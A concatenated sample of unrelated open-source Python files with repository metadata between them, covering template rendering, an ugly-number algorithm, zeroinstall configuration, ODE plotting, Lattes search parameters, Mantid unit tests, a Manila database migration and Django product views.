_SUPPORTED_LANGUAGES = [d for d in os.listdir(TEMPLATES_DIR) if os.path.isdir(os.path.join(TEMPLATES_DIR, d))]
_CONSTS = dict(((name, getattr(consts, name)) for name in dir(consts) if name.upper() == name))
JINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader([os.path.join(os.path.dirname(__file__))]),
extensions=[TranslateExtension])
@returns(unicode)
@arguments(template_name=str, languages=[str], variables=dict, category=unicode)
def render(template_name, languages, variables, category=""):
logging.info("Rendering %s for languages %s" % (template_name, languages))
variables = dict(variables)
variables.update(_CONSTS)
variables["BASE_URL"] = get_server_settings().baseUrl
variables["INCLUDE_ROGERTHAT_DOT_NET"] = True
if not languages:
languages = list()
languages.append(DEFAULT_LANGUAGE)
logging.debug("Supported languages: %s" % _SUPPORTED_LANGUAGES)
for lang in languages:
lang = lang.replace('-', '_')
file_name = os.path.join(TEMPLATES_DIR, lang, category, "%s.tmpl" % template_name)
if lang in _SUPPORTED_LANGUAGES and os.path.exists(file_name):
return template.render(file_name, variables)
if '_' in lang:
lang = lang.split('_')[0]
file_name = os.path.join(TEMPLATES_DIR, lang, category, "%s.tmpl" % template_name)
if lang in _SUPPORTED_LANGUAGES and os.path.exists(file_name):
return template.render(file_name, variables)
raise NotImplementedError("Template not found!")
@returns([str])
@arguments(header=unicode)
def get_languages_from_header(header):
if not header:
return [DEFAULT_LANGUAGE]
try:
languages = list()
for item in header.split(','):
items = item.split(';')
lang = items[0]
splitted = lang.split('-')
if len(splitted) == 2:
lang = '%s_%s' % (splitted[0].lower(), splitted[1].upper())
if len(items) == 1:
languages.append((lang, 1.0))
else:
qualifier = items[1].split("=")[1]
languages.append((lang, float(qualifier)))
return [str(i[0]) for i in sorted(languages, key=lambda x: x[1], reverse=True)]
except:
logging.exception("Could not parse language header.")
return [DEFAULT_LANGUAGE]
@returns([str])
@arguments(request=object)
def get_languages_from_request(request):
return get_languages_from_header(request.headers.get('Accept-Language', None))
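# Illustrative note (added for clarity; not part of the original module):
# given the header 'en-US,en;q=0.8,nl;q=0.6', get_languages_from_header
# returns ['en_US', 'en', 'nl'] -- languages sorted by descending q-value.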
| apache-2.0 | -4,756,188,799,871,613,000 | 38.955556 | 113 | 0.666574 | false |
shub0/algorithm-data-structure | python/ugly_nums.py | 1 | 1800 | '''
Write a program to check whether a given number is an ugly number.
Ugly numbers are positive numbers whose prime factors only include 2, 3, 5. For example, 6, 8 are ugly while 14 is not ugly since it includes another prime factor 7.
Note that 1 is typically treated as an ugly number.
'''
class Solution(object):
def isUgly(self, num):
"""
:type num: int
:rtype: bool
"""
if num <= 0:
return False  # 0 and negative numbers are not ugly
while num > 1:
if (num % 2 == 0):
num /= 2
elif (num % 3 == 0):
num /= 3
elif (num % 5 == 0):
num /= 5
else:
return False
return True
def nthSuperUglyNumber(self, n, primes):
"""
:type n: int
:type primes: List[int]
:rtype: int
"""
size = len(primes)
nums = [1]
indices = [0] * size
local_num = [0] * size
while n > 1:
local_num = [ primes[index] * nums[indices[index]] for index in range(size) ]
num = min(local_num)
for index in range(size):
if local_num[index] == num:
indices[index] += 1
nums.append(num)
n -= 1
return nums[-1]
def nthUglyNumber(self, n):
"""
:type n: int
:rtype: int
"""
nums = [1]
i2,i3,i5=0,0,0
while n > 1:
u2,u3,u5 = nums[i2]*2, nums[i3]*3, nums[i5]*5
num = min(u2, u3, u5)
if num == u2:
i2 += 1
if num == u3:
i3 += 1
if num == u5:
i5 += 1
nums.append(num)
n -= 1
return nums[-1]
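# Illustrative checks (added for clarity; not part of the original file).
if __name__ == '__main__':
    solution = Solution()
    print(solution.isUgly(6))     # True: 6 = 2 * 3
    print(solution.isUgly(14))    # False: 14 has the prime factor 7
    print(solution.nthUglyNumber(10))                       # 12
    print(solution.nthSuperUglyNumber(12, [2, 7, 13, 19]))  # 32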
| bsd-3-clause | 8,164,448,989,103,989,000 | 26.272727 | 165 | 0.436111 | false |
dabrahams/zeroinstall | zeroinstall/injector/config.py | 1 | 4191 | """
Holds user settings and various helper objects.
"""
# Copyright (C) 2011, Thomas Leonard
# See the README file for details, or visit http://0install.net.
from zeroinstall import _
import os
from logging import info, warn
import ConfigParser
from zeroinstall import zerostore
from zeroinstall.injector.model import network_levels, network_full
from zeroinstall.injector.namespaces import config_site, config_prog
from zeroinstall.support import basedir
DEFAULT_FEED_MIRROR = "http://roscidus.com/0mirror"
DEFAULT_KEY_LOOKUP_SERVER = 'https://keylookup.appspot.com'
class Config(object):
"""
@ivar auto_approve_keys: whether to approve known keys automatically
@type auto_approve_keys: bool
@ivar handler: handler for main-loop integration
@type handler: L{handler.Handler}
@ivar key_info_server: the base URL of a key information server
@type key_info_server: str
@ivar feed_mirror: the base URL of a mirror site for keys and feeds
@type feed_mirror: str | None
@ivar freshness: seconds since a feed was last checked before it is considered stale
@type freshness: int
"""
__slots__ = ['help_with_testing', 'freshness', 'network_use', 'feed_mirror', 'key_info_server', 'auto_approve_keys',
'_fetcher', '_stores', '_iface_cache', '_handler', '_trust_mgr', '_trust_db']
def __init__(self, handler = None):
self.help_with_testing = False
self.freshness = 60 * 60 * 24 * 30
self.network_use = network_full
self._handler = handler
self._fetcher = self._stores = self._iface_cache = self._trust_mgr = self._trust_db = None
self.feed_mirror = DEFAULT_FEED_MIRROR
self.key_info_server = DEFAULT_KEY_LOOKUP_SERVER
self.auto_approve_keys = True
@property
def stores(self):
if not self._stores:
self._stores = zerostore.Stores()
return self._stores
@property
def iface_cache(self):
if not self._iface_cache:
from zeroinstall.injector import iface_cache
self._iface_cache = iface_cache.iface_cache
#self._iface_cache = iface_cache.IfaceCache()
return self._iface_cache
@property
def fetcher(self):
if not self._fetcher:
from zeroinstall.injector import fetch
self._fetcher = fetch.Fetcher(self)
return self._fetcher
@property
def trust_mgr(self):
if not self._trust_mgr:
from zeroinstall.injector import trust
self._trust_mgr = trust.TrustMgr(self)
return self._trust_mgr
@property
def trust_db(self):
from zeroinstall.injector import trust
self._trust_db = trust.trust_db
return self._trust_db
@property
def handler(self):
if not self._handler:
from zeroinstall.injector import handler
if os.isatty(1):
self._handler = handler.ConsoleHandler()
else:
self._handler = handler.Handler()
return self._handler
def save_globals(self):
"""Write global settings."""
parser = ConfigParser.ConfigParser()
parser.add_section('global')
parser.set('global', 'help_with_testing', self.help_with_testing)
parser.set('global', 'network_use', self.network_use)
parser.set('global', 'freshness', self.freshness)
parser.set('global', 'auto_approve_keys', self.auto_approve_keys)
path = basedir.save_config_path(config_site, config_prog)
path = os.path.join(path, 'global')
parser.write(open(path + '.new', 'w'))
os.rename(path + '.new', path)
def load_config(handler = None):
config = Config(handler)
parser = ConfigParser.RawConfigParser()
parser.add_section('global')
parser.set('global', 'help_with_testing', 'False')
parser.set('global', 'freshness', str(60 * 60 * 24 * 30)) # One month
parser.set('global', 'network_use', 'full')
parser.set('global', 'auto_approve_keys', 'True')
path = basedir.load_first_config(config_site, config_prog, 'global')
if path:
info("Loading configuration from %s", path)
try:
parser.read(path)
except Exception as ex:
warn(_("Error loading config: %s"), str(ex) or repr(ex))
config.help_with_testing = parser.getboolean('global', 'help_with_testing')
config.network_use = parser.get('global', 'network_use')
config.freshness = int(parser.get('global', 'freshness'))
config.auto_approve_keys = parser.getboolean('global', 'auto_approve_keys')
assert config.network_use in network_levels, config.network_use
return config
| lgpl-2.1 | 1,600,320,682,563,970,000 | 31.238462 | 117 | 0.715581 | false |
cjmathy/ode_model | ode_modeler/plot.py | 1 | 3666 | import os
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
def plot_all_queries(species, queries, out_dir, out_format,
plot_species, ttot, **kwargs):
'''
Description:
This method creates plots for each species, plotting timecourse curves
from all queries on the same plot.
Input:
species - a dictionary mapping strings to Species objects.
queries - a list of query objects.
out_dir - the path to the output directory.
out_format - the file format for output figures.
plot_species - a list containing species names to be plotted. default
is to generate plots for all species.
ttot - the total length of simulation.
'''
if out_format == 'pdf_one':
pdf = PdfPages(os.path.join(out_dir + '/all_queries.pdf'))
if plot_species[0] == 'all':
plot_species = species.keys()
for sp in plot_species:
fig = plt.figure()
for query in queries:
plt.plot(query.t, query.concentrations[:, species[sp].index])
plt.title(sp)
plt.ylabel('Concentration (uM)')
plt.xlabel('Time (seconds)')
plt.legend(queries)
plt.xticks(np.arange(0, ttot+1, ttot/2))
plt.grid(True)
if out_format == 'pdf_mult':
pdf = PdfPages(
os.path.join(out_dir + '/{}.pdf'.format(sp)))
pdf.savefig()
pdf.close()
if out_format == 'png':
fig.savefig(os.path.join(out_dir + '/{}.png'.format(sp)))
if out_format == 'pdf_one':
pdf.savefig()
plt.close()
if out_format == 'pdf_one':
pdf.close()
return
def plot_each_query(species, queries, out_dir, out_format,
plot_species, ttot, **kwargs):
'''
Description:
This method creates plots for each species, plotting timecourse curves
from each query separately.
Input:
species - a dictionary mapping strings to Species objects.
queries - a list of query objects.
out_dir - the path to the output directory.
out_format - the file format for output figures.
plot_species - a list containing species names to be plotted. default
is to generate plots for all species.
ttot - the total length of simulation.
'''
if plot_species[0] == 'all':
plot_species = species.keys()
for query in queries:
if out_format == 'pdf_one':
pdf = PdfPages(
os.path.join(
out_dir + '/{}.pdf'.format(query.name)))
for sp in plot_species:
fig = plt.figure()
plt.plot(query.t, query.concentrations[:, species[sp].index])
plt.title('{}, {}'.format(sp, query.name))
plt.ylabel('Concentration (uM)')
plt.xlabel('Time (seconds)')
plt.xticks(np.arange(0, ttot+1, ttot/2))
plt.grid(True)
if out_format == 'pdf_mult':
pdf = PdfPages(
os.path.join(
out_dir + '/{}_{}.pdf'.format(
query.name, sp)))
pdf.savefig()
pdf.close()
if out_format == 'png':
fig.savefig(
os.path.join(
out_dir + '/{}_{}.png'.format(
query.name, sp)))
if out_format == 'pdf_one':
pdf.savefig()
plt.close()
if out_format == 'pdf_one':
pdf.close()
return
| apache-2.0 | 3,636,057,399,998,828,000 | 30.333333 | 78 | 0.533824 | false |
josefson/CNPQ | lattes/search_data.py | 1 | 3395 | # search_data: The data to be used in a search POST.
search_data = {
'metodo': 'buscar',
'acao': '',
'resumoFormacao': '',
'resumoAtividade': '',
'resumoAtuacao': '',
'resumoProducao': '',
'resumoPesquisador': '',
'resumoIdioma': '',
'resumoPresencaDGP': '',
'resumoModalidade': 'Bolsas+de+PQ+de+categorias0',
'modoIndAdhoc': '',
'buscaAvancada': '0',
'filtros.buscaNome': 'true',
'textoBusca': '.',
'buscarDoutores': 'true',
'buscarDemais': 'true',
'buscarBrasileiros': 'true',
'buscarEstrangeiros': 'true',
'paisNascimento': '0',
'textoBuscaTodas': '',
'textoBuscaFrase': '',
'textoBuscaQualquer': '',
'textoBuscaNenhuma': '',
'textoExpressao': '',
'buscarDoutoresAvancada': 'true',
'buscarBrasileirosAvancada': 'true',
'buscarEstrangeirosAvancada': 'true',
'paisNascimentoAvancada': '0',
'filtros.atualizacaoCurriculo': '48',
'quantidadeRegistros': '20',
'filtros.visualizaEnderecoCV': 'true',
'filtros.visualizaFormacaoAcadTitCV': 'true',
'filtros.visualizaAtuacaoProfCV': 'true',
'filtros.visualizaAreasAtuacaoCV': 'true',
'filtros.visualizaIdiomasCV': 'true',
'filtros.visualizaPremiosTitulosCV': 'true',
'filtros.visualizaSoftwaresCV': 'true',
'filtros.visualizaProdutosCV': 'true',
'filtros.visualizaProcessosCV': 'true',
'filtros.visualizaTrabalhosTecnicosCV': 'true',
'filtros.visualizaOutrasProdTecCV': 'true',
'filtros.visualizaArtigosCV': 'true',
'filtros.visualizaLivrosCapitulosCV': 'true',
'filtros.visualizaTrabEventosCV': 'true',
'filtros.visualizaTxtJornalRevistaCV': 'true',
'filtros.visualizaOutrasProdBibCV': 'true',
'filtros.visualizaProdArtCultCV': 'true',
'filtros.visualizaOrientacoesConcluidasCV': 'true',
'filtros.visualizaOrientacoesAndamentoCV': 'true',
'filtros.visualizaDemaisTrabalhosCV': 'true',
'filtros.visualizaDadosComplementaresCV': 'true',
'filtros.visualizaOutrasInfRelevantesCV': 'true',
'filtros.radioPeriodoProducao': '1',
'filtros.visualizaPeriodoProducaoCV': '',
'filtros.categoriaNivelBolsa': '',
'filtros.modalidadeBolsa': '0',
'filtros.nivelFormacao': '0',
'filtros.paisFormacao': '0',
'filtros.regiaoFormacao': '0',
'filtros.ufFormacao': '0',
'filtros.nomeInstFormacao': '',
'filtros.conceitoCurso': '',
'filtros.buscaAtuacao': 'false',
'filtros.codigoGrandeAreaAtuacao': '0',
'filtros.codigoAreaAtuacao': '0',
'filtros.codigoSubareaAtuacao': '0',
'filtros.codigoEspecialidadeAtuacao': '0',
'filtros.orientadorCNPq': '',
'filtros.idioma': '0',
'filtros.grandeAreaProducao': '0',
'filtros.areaProducao': '0',
'filtros.setorProducao': '0',
'filtros.naturezaAtividade': '0',
'filtros.paisAtividade': '0',
'filtros.regiaoAtividade': '0',
'filtros.ufAtividade': '0',
'filtros.nomeInstAtividade': '',
}
# params_payload: The params to be used in a GET pagination.
params_payload = {
'metodo': 'forwardPaginaResultados',
'registros': '1;1000',
'query': ('( +idx_particao:1 +idx_nacionalidade:e) or '
'( +idx_particao:1 +idx_nacionalidade:b)'),
'analise': 'cv',
'tipoOrdenacao': 'null',
'paginaOrigem': 'index.do',
'mostrarScore': 'false',
'mostrarBandeira': 'false',
'modoIndAdhoc': 'null',
}
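# Illustrative sketch (added for clarity; not part of the original module) of
# how these dicts might be submitted with the `requests` library. The endpoint
# URL below is an assumption for demonstration only and may not match the real
# Lattes service.
if __name__ == '__main__':
    import requests
    assumed_url = 'http://buscatextual.cnpq.br/buscatextual/busca.do'
    search_response = requests.post(assumed_url, data=search_data)
    print(search_response.status_code)
    page_response = requests.get(assumed_url, params=params_payload)
    print(page_response.status_code)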
| mit | -2,093,086,758,916,944,100 | 35.117021 | 60 | 0.653608 | false |
Iwan-Zotow/runEGS | XcIO/names_helper.py | 1 | 2104 | # -*- coding: utf-8 -*-
EGSPHAN_EXT = ".egsphant"
EGSINP_EXT = ".egsinp"
EGSPHSF_EXT = ".egsphsp1"
def make_cup_prefix(radUnit, outerCup, innerCupSer, innerCupNum):
"""
Makes filename prefix given RU, OC, IC info
Parameters
----------
radUnit: string
radiation unit
outerCup: string
outer cup info
innerCupSer: string
inner cup serial line
innerCupNum: integer
inner cup number
returns: string
clinical cup name
"""
return "R" + radUnit + "O" + outerCup + "I" + innerCupSer + innerCupNum
return "R" + radUnit + "O" + outerCup + "I" + innerCupSer + innerCupNum
def make_qualified_name(file_prefix, cl, shot):
"""
Makes qualified name
Parameters
----------
file_prefix: string
prefix with RU and cup info
cl: collimator
collimator info
shot: (float,float) tuple
shot position
returns: string
fully qualified cup name
"""
return file_prefix + str(cl) + "_" + "Y{0}Z{1}".format(int(shot[0]),int(shot[1]))
def make_egsinput_name(full_prefix):
"""
Makes EGS input name
"""
return full_prefix + EGSINP_EXT
def parse_file_prefix(s):
"""
Parse file prefix string and produce rad.unit, outer cup, inner cup, inner cup number, collimator
"""
radUnit = str(s[1:2])
outerCup = str(s[3:4])
innerCupSer = str(s[5:6])
innerCupNum = str(s[6:8])
coll = int(str(s[9:11]))
return (radUnit, outerCup, innerCupSer, innerCupNum, coll)
def parse_shot(s):
"""
Parse input string to extract shot
"""
idx_shot = s.find("_")
if idx_shot < 0:
raise ValueError("No shot info in input")
sh = s[idx_shot+1:]
idx_Y = sh.find("Y")
if idx_Y < 0:
raise ValueError("No Y shot position in input")
idx_Z = sh.find("Z")
if idx_Z < 0:
raise ValueError("No Z shot position in input")
sh_Y = sh[idx_Y+1:idx_Z]
sh_Z = sh[idx_Z+1:]
return (float(sh_Y), float(sh_Z))
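# Illustrative sketch (added for clarity; not part of the original module):
# one way the helpers above might be combined. The radiation-unit, cup and
# collimator values are made up for demonstration.
if __name__ == '__main__':
    cup_prefix = make_cup_prefix("8", "2", "M", "01")              # R8O2IM01
    qualified = make_qualified_name(cup_prefix + "C", 25, (10.0, 15.0))
    print(qualified)                             # R8O2IM01C25_Y10Z15
    print(make_egsinput_name(qualified))         # R8O2IM01C25_Y10Z15.egsinp
    print(parse_file_prefix(qualified))          # ('8', '2', 'M', '01', 25)
    print(parse_shot(qualified))                 # (10.0, 15.0)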
| apache-2.0 | 574,515,979,374,324,900 | 21.147368 | 101 | 0.565589 | false |
mganeva/mantid | scripts/test/isis_powder/ISISPowderInstrumentSettingsTest.py | 1 | 10800 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
from __future__ import (absolute_import, division, print_function)
import mantid
import unittest
import warnings
from six import assertRaisesRegex, assertRegex
from isis_powder.routines import instrument_settings, param_map_entry
class ISISPowderInstrumentSettingsTest(unittest.TestCase):
def test_user_missing_attribute_is_detected(self):
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name")
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=[param_entry])
with assertRaisesRegex(self, AttributeError, "is required but was not set or passed"):
foo = inst_settings_obj.script_facing_name
del foo
def test_user_missing_attribute_prints_enum_values(self):
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name",
enum_class=SampleEnum)
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=[param_entry])
# Check it still prints the acceptable values when it fails
with assertRaisesRegex(self, AttributeError, "A BAR"):
foo = inst_settings_obj.script_facing_name
del foo
def test_developer_missing_attribute_is_detected(self):
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name")
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=[param_entry])
with assertRaisesRegex(self, AttributeError, "Please contact the development team"):
foo = inst_settings_obj.not_known
del foo
def test_set_attribute_is_found(self):
expected_value = 100
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name")
keyword_args = {"user_facing_name": expected_value}
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=[param_entry], kwargs=keyword_args)
self.assertEqual(inst_settings_obj.script_facing_name, expected_value)
def test_updating_attributes_produces_warning_on_init(self):
original_value = 123
new_value = 456
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name")
# First check this works on init
adv_config = {"user_facing_name": original_value}
keyword_args = {"user_facing_name": new_value}
with warnings.catch_warnings(record=True) as warning_capture:
warnings.simplefilter("always")
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=[param_entry], kwargs=keyword_args,
adv_conf_dict=adv_config)
assertRegex(self, str(warning_capture[-1].message), "which was previously set to")
assertRegex(self, str(warning_capture[-1].message), str(original_value))
assertRegex(self, str(warning_capture[-1].message), str(new_value))
self.assertEqual(inst_settings_obj.script_facing_name, new_value)
def test_updating_attributes_produces_warning(self):
original_value = 123
new_value = 456
second_value = 567
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name")
# First check this works on init
adv_config = {"user_facing_name": original_value}
config_dict = {"user_facing_name": new_value}
keyword_args = {"user_facing_name": second_value}
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=[param_entry], adv_conf_dict=adv_config)
self.assertEqual(inst_settings_obj.script_facing_name, original_value)
# Next try to update the attribute and check it gives a warning
with warnings.catch_warnings(record=True) as warning_capture:
warnings.simplefilter("always")
inst_settings_obj.update_attributes(basic_config=config_dict)
assertRegex(self, str(warning_capture[-1].message), "which was previously set to")
assertRegex(self, str(warning_capture[-1].message), str(original_value))
assertRegex(self, str(warning_capture[-1].message), str(new_value))
warnings_current_length = len(warning_capture)
# Then check that we only get one additional warning when replacing values again not two
inst_settings_obj.update_attributes(kwargs=keyword_args)
self.assertEqual(warnings_current_length + 1, len(warning_capture))
warnings_current_length = len(warning_capture)
# Check that the suppress field works by setting it back to second value
inst_settings_obj.update_attributes(kwargs=config_dict, suppress_warnings=True)
self.assertEqual(warnings_current_length, len(warning_capture))
# Check we only get no additional warnings from setting the value to the same
inst_settings_obj.update_attributes(kwargs=config_dict)
self.assertEqual(warnings_current_length, len(warning_capture))
# Finally check it has took the new value (most recently set)
self.assertEqual(inst_settings_obj.script_facing_name, new_value)
def test_inst_settings_enters_into_dicts(self):
param_entries = [
param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name"),
param_map_entry.ParamMapEntry(ext_name="user_facing_name2", int_name="script_facing_name2")
]
expected_value = 101
# Check recursion of a dictionary containing a dictionary takes place
example_dict = {"user_facing_name": expected_value}
nested_dict = {"some_random_name": example_dict}
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=param_entries, adv_conf_dict=nested_dict)
self.assertEqual(inst_settings_obj.script_facing_name, expected_value)
# Next check that any attributes that a mixed dictionary contains are added
mixed_dict = {"some_random_name2": example_dict,
"user_facing_name2": expected_value * 2}
second_inst_settings_obj = instrument_settings.InstrumentSettings(param_map=param_entries,
adv_conf_dict=mixed_dict)
self.assertEqual(second_inst_settings_obj.script_facing_name, expected_value)
self.assertEqual(second_inst_settings_obj.script_facing_name2, expected_value * 2)
def test_check_enum_check_and_set_works(self):
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name",
enum_class=SampleEnum)
# First test we cannot set it to a different value
incorrect_value_dict = {"user_facing_name": "wrong"}
with assertRaisesRegex(self, ValueError, "The user specified value: 'wrong' is unknown"):
instrument_settings.InstrumentSettings(param_map=[param_entry],
adv_conf_dict=incorrect_value_dict)
# Check that we can set a known good enum
good_value_dict = {"user_facing_name": SampleEnum.a_bar}
inst_obj = instrument_settings.InstrumentSettings(param_map=[param_entry], adv_conf_dict=good_value_dict)
self.assertEqual(inst_obj.script_facing_name, SampleEnum.a_bar)
# Next check it passes on mixed case and converts it back to the correct case
different_case_dict = {"user_facing_name": SampleEnum.a_bar.lower()}
inst_obj = instrument_settings.InstrumentSettings(param_map=[param_entry], adv_conf_dict=different_case_dict)
self.assertEqual(inst_obj.script_facing_name, SampleEnum.a_bar, "Case is not being converted correctly")
def test_param_map_rejects_enum_missing_friendly_name(self):
# Check that is the friendly name is not set it is correctly detected
with assertRaisesRegex(self, RuntimeError,
"'enum_friendly_name' was not set. Please contact development team."):
param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name",
enum_class=BadSampleEnum)
def test_optional_attribute_works(self):
optional_param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name",
optional=True)
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name",
optional=False)
# Check that not passing an optional and trying to access it works correctly
opt_inst_obj = instrument_settings.InstrumentSettings(param_map=[optional_param_entry])
self.assertIsNone(opt_inst_obj.script_facing_name)
# Check that setting optional to false still throws
inst_obj = instrument_settings.InstrumentSettings(param_map=[param_entry])
with self.assertRaises(AttributeError):
getattr(inst_obj, "script_facing_name")
# Check if we do set an optional from fresh it does not emit a warning and is set
optional_value = 100
random_value_dict = {"user_facing_name": 8}
optional_value_dict = {"user_facing_name": optional_value}
# Check that setting a value from fresh does not emit a warning
with warnings.catch_warnings(record=True) as warnings_capture:
warnings.simplefilter("always")
num_warnings_before = len(warnings_capture)
opt_inst_obj.update_attributes(kwargs=random_value_dict)
self.assertEqual(len(warnings_capture), num_warnings_before)
# Then check setting it a second time does
opt_inst_obj.update_attributes(kwargs=optional_value_dict)
self.assertEqual(len(warnings_capture), num_warnings_before + 1)
self.assertEqual(opt_inst_obj.script_facing_name, optional_value)
class SampleEnum(object):
enum_friendly_name = "test_enum_name"
# The mixed casing is intentional
a_foo = "a foo"
a_bar = "A BAR"
class BadSampleEnum(object):
a_foo = "a foo"
if __name__ == "__main__":
unittest.main()
| gpl-3.0 | -2,600,867,022,597,814,000 | 49.232558 | 120 | 0.661019 | false |
openstack/manila | manila/db/migrations/alembic/versions/344c1ac4747f_add_share_instance_access_rules_status.py | 1 | 4287 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Remove access rules status and add access_rule_status to share_instance
model
Revision ID: 344c1ac4747f
Revises: dda6de06349
Create Date: 2015-11-18 14:58:55.806396
"""
# revision identifiers, used by Alembic.
revision = '344c1ac4747f'
down_revision = 'dda6de06349'
from alembic import op
from sqlalchemy import Column, String
from manila.common import constants
from manila.db.migrations import utils
priorities = {
'active': 0,
'new': 1,
'error': 2
}
upgrade_data_mapping = {
'active': 'active',
'new': 'out_of_sync',
'error': 'error',
}
def upgrade():
"""Transform individual access rules states to 'access_rules_status'.
WARNING: This method performs lossy converting of existing data in DB.
"""
op.add_column(
'share_instances',
Column('access_rules_status', String(length=255))
)
connection = op.get_bind()
share_instances_table = utils.load_table('share_instances', connection)
instance_access_table = utils.load_table('share_instance_access_map',
connection)
    # NOTE(u_glide): Data migrations shouldn't be performed on live clouds
    # because they can lead to unpredictable behaviour of running operations
    # like migration.
instances_query = (
share_instances_table.select()
.where(share_instances_table.c.status == constants.STATUS_AVAILABLE)
.where(share_instances_table.c.deleted == 'False')
)
for instance in connection.execute(instances_query):
access_mappings_query = instance_access_table.select().where(
instance_access_table.c.share_instance_id == instance['id']
).where(instance_access_table.c.deleted == 'False')
status = constants.STATUS_ACTIVE
for access_rule in connection.execute(access_mappings_query):
if (access_rule['state'] == constants.STATUS_DELETING or
access_rule['state'] not in priorities):
continue
if priorities[access_rule['state']] > priorities[status]:
status = access_rule['state']
# pylint: disable=no-value-for-parameter
op.execute(
share_instances_table.update().where(
share_instances_table.c.id == instance['id']
).values({'access_rules_status': upgrade_data_mapping[status]})
)
op.drop_column('share_instance_access_map', 'state')
def downgrade():
op.add_column(
'share_instance_access_map',
Column('state', String(length=255))
)
connection = op.get_bind()
share_instances_table = utils.load_table('share_instances', connection)
instance_access_table = utils.load_table('share_instance_access_map',
connection)
instances_query = (
share_instances_table.select()
.where(share_instances_table.c.status == constants.STATUS_AVAILABLE)
.where(share_instances_table.c.deleted == 'False')
)
for instance in connection.execute(instances_query):
        # NOTE(u_glide): We cannot determine if a rule is applied or not in
        # Manila, so the administrator should manually handle such access rules.
if instance['access_rules_status'] == 'active':
state = 'active'
else:
state = 'error'
# pylint: disable=no-value-for-parameter
op.execute(
instance_access_table.update().where(
instance_access_table.c.share_instance_id == instance['id']
).where(instance_access_table.c.deleted == 'False').values(
{'state': state}
)
)
op.drop_column('share_instances', 'access_rules_status')
| apache-2.0 | 2,971,264,081,608,974,300 | 31.477273 | 76 | 0.642641 | false |
michaelgichia/WeideShop | weideshop/products/views.py | 1 | 3232 | # -*- coding: utf-8 -*-
# Third party stuff
from django.shortcuts import render, get_object_or_404
from django.views.generic import ListView, DetailView
from django.views.generic.base import TemplateView
# Our stuff
from .models import Product, Subcategory, Category
class CategoryListView(ListView):
"""
Browse all products in the categories.
"""
	model = Category
template_name = 'products/category_list.html'
context_object_name = "Category list"
def get_queryset(self):
"""
Returns all categories.
"""
return Category.objects.get_queryset().all()
class SubcategoryListView(ListView):
"""
Browse all products in the sub-catalogue.
"""
model = Subcategory
template_name = 'products/subcategory_list.html'
context_object_name = "Sub-Category list"
category_model = Category
def get_queryset(self):
"""
Returns all sub-categories.
"""
self.category = get_object_or_404(Category, category_slug = self.kwargs.get('category_slug'))
return Subcategory.objects.filter(category = self.category)
def get_context_data(self, **kwargs):
"""
		Returns self.category_slug, needed
		in subcategory_list.html as one of
		the {% url %} slug params.
"""
context = super(SubcategoryListView, self).get_context_data(**kwargs)
context['categories'] = Category.objects.all()
context['category_slug'] = self.kwargs.get('category_slug')
return context
class ProductListView(ListView):
"""
	Browse products according to the previously selected subcategory.
"""
model = Product
template_name = 'products/product_list.html'
context_object_name = "Product list"
def get_context_data(self, **kwargs):
"""
		Returns self.category_slug and self.subcategory_slug, needed
		in product_list.html as one of
		the {% url %} slug params.
"""
context = super(ProductListView, self).get_context_data(**kwargs)
# Get category_slug
context['categories'] = Category.objects.all()
context['category_slug'] = self.kwargs.get('category_slug')
# Get subcategory_slug
context['subcategories'] = Subcategory.objects.all()
context['subcategory_slug'] = self.kwargs.get('subcategory_slug')
return context
def get_queryset(self):
"""
		Browse all products under the selected subcategory.
"""
self.sub_category = get_object_or_404(Subcategory, subcategory_slug = self.kwargs.get('subcategory_slug'))
return Product.objects.filter(sub_category = self.sub_category)
class ProductDetailView(DetailView):
"""
Display individual products details
"""
model = Product
def get_object(self):
"""
For unknown reasons :) you must pass self.product_slug
"""
object = get_object_or_404(Product, product_slug=self.kwargs['product_slug'])
return object
class CatalogueListView(ListView):
"""
Display all products in the db.
"""
model = Product
def get_queryset(self):
"""
		Returns all products.
"""
return Product.objects.get_queryset().all()
class CatalogueDetailView(DetailView):
"""
Display individual products details
"""
model = Product
template_name = 'products/product_detail.html'
slug_field = 'product_slug'
def get_object(self):
"""
Call the superclass
"""
object = super(CatalogueDetailView, self).get_object()
return object
| bsd-2-clause | 3,212,083,904,628,984,000 | 23.671756 | 108 | 0.716584 | false |
lcrees/knife | knife/_active.py | 1 | 6481 | # -*- coding: utf-8 -*-
'''active knives'''
from threading import local
from collections import deque
from contextlib import contextmanager
from stuf.utils import clsname
from knife._compat import loads, optimize
class _ActiveMixin(local):
'''active knife mixin'''
def __init__(self, *things, **kw):
'''
Initialize :mod:`knife`.
:argument things: incoming things
:keyword integer snapshots: snapshots to keep (default: ``5``)
'''
incoming = deque()
incoming.extend(things)
